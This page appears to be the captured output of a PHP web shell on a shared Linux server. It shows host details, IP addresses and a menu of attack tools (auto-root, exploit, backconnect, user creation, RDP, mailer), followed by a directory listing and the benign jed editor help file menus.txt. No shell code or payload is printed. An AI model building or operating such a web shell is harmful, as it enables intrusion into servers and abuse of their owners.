Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
jed-common /
txt /
[ HOME SHELL ]
Name
Size
Permission
Action
abbrev.txt
7.28
KB
-rw-r--r--
color.txt
1.64
KB
-rw-r--r--
compile.txt
2.2
KB
-rw-r--r--
dfa.txt
8.8
KB
-rw-r--r--
edt.txt
2.45
KB
-rw-r--r--
emacs.txt
8.53
KB
-rw-r--r--
filelock.txt
1.08
KB
-rw-r--r--
fold.txt
5.89
KB
-rw-r--r--
hooks.txt
19.85
KB
-rw-r--r--
ide-mode.txt
7.65
KB
-rw-r--r--
jed_faq.txt
18.17
KB
-rw-r--r--
linux-keys.txt
1.05
KB
-rw-r--r--
menus.txt
1.84
KB
-rw-r--r--
mouse.txt
6.64
KB
-rw-r--r--
pc-keys.txt
3.78
KB
-rw-r--r--
program.txt
5.13
KB
-rw-r--r--
rgrep.txt
1.25
KB
-rw-r--r--
rmail.txt
3.75
KB
-rw-r--r--
script.txt
4.05
KB
-rw-r--r--
syntax.txt
2.47
KB
-rw-r--r--
undo.txt
264
B
-rw-r--r--
utf8.txt
3.56
KB
-rw-r--r--
wjed.txt
7.65
KB
-rw-r--r--
wordstar.txt
1.76
KB
-rw-r--r--
xjed.txt
6.21
KB
-rw-r--r--
xrenderfont.txt
868
B
-rw-r--r--
yankpop.txt
4.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menus.txt
This file documents the drop-down menu support in non-Windows versions of jed. Menu Activation and Navigation ------------------------------ The menus may be activated via the mouse, or by pressing the F10 key or the ESC-m key. Also, ESC + accelerator character may be used to activate a particular menu-bar item, e.g. `ESC-f' to select the `File' menu, provided that the particular editor emulation does not bind the key to something else. For example, Emacs uses ESC-f to move by words. See the discussion about `enable_menu_keys' below to work around this problem. The arrow keys or the mouse may be used to navigate the menus. Use the ENTER key to select a menu item. To go back to a previous menu, press either the ESC key or the backspace key. Menu Colors ----------- The colors of the menus may be controlled by the `set_color' strings: "menu" Color of the menu bar "menu_popup" Color of the popped-up menu window "menu_char" Color of the keyboard-accelerator character "menu_selection" Color of the current selection "menu_shadow" Color of the popup-box shadow Special Hints ------------- To enable the mouse when running jed in an xterm, put the line enable_xmouse (); in your .jedrc file. To hide the menu bar, put enable_top_status_line (0); in your .jedrc file. This will hide the menu bar until it is activated via a key such as F10. Some terminals map the ALT key modifier to ESC + key. For such terminals, an item on the menu bar may be activated via the ALT key + the accelerator key, e.g., `ALT-f' to select the file menu. The main problem with hot-keys such as ESC-f is that certain modes rebind these keys to other function. To rebind these keys to the menubar functions, put the line: enable_menu_keys (); in your .jedrc file AFTER loading the appropriate editor emulation, e.g., emacs.
Close